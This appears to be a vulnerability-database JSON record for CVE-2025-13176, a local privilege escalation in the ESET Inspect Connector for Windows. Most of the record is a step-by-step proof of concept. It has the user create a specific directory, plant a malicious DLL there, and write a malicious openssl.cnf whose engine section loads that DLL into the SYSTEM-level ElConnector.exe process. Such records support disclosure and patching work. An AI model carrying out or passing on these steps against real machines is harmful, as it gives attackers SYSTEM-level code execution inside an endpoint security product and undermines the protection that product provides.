{"uuid": "2a78906e-dc1d-4e26-926a-8ac459ad654d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-13176", "type": "published-proof-of-concept", "source": "https://t.me/P0x3k_1N73LL1G3NC3/273", "content": "CVE-2025-13176: Local Privilege Escalation in ESET Inspect EDR\n\nLPE vulnerability in the ESET Inspect Connector for Windows (versions prior to 3.0.5765) due to the ElConnector.exe process (running as SYSTEM) attempting to load an OpenSSL configuration file from a non-existent path that can be created by a low-privileged user\n\nPoC:\n1) Create the directory: C:\\src\\vcpkg\\packages\\openssl_x64-windows-static\\\n\n2) Place a malicious DLL (e.g., woot.dll) in that directory.\n\n3) Create an openssl.cnf file in that directory with the following content:\n# Malicious openssl.cnf\nopenssl_conf = openssl_init\n\n[openssl_init]\nengines = engine_section\n\n[engine_section]\ncmd = cmd_section\n\n[cmd_section]\nengine_id = cmd\ndynamic_path = C:\\\\src\\\\vcpkg\\\\packages\\\\openssl_x64-windows-static\\\\woot.dll\ninit = 0\n\n4) Wait for the ESET Inspect Connector service to restart or trigger an OpenSSL initialization.\n\n5) The woot.dll is loaded inside the EDR\u2019s process and executed as SYSTEM. There is no signing requirement for DLLs in this process.", "creation_timestamp": "2026-02-18T09:03:41.000000Z"}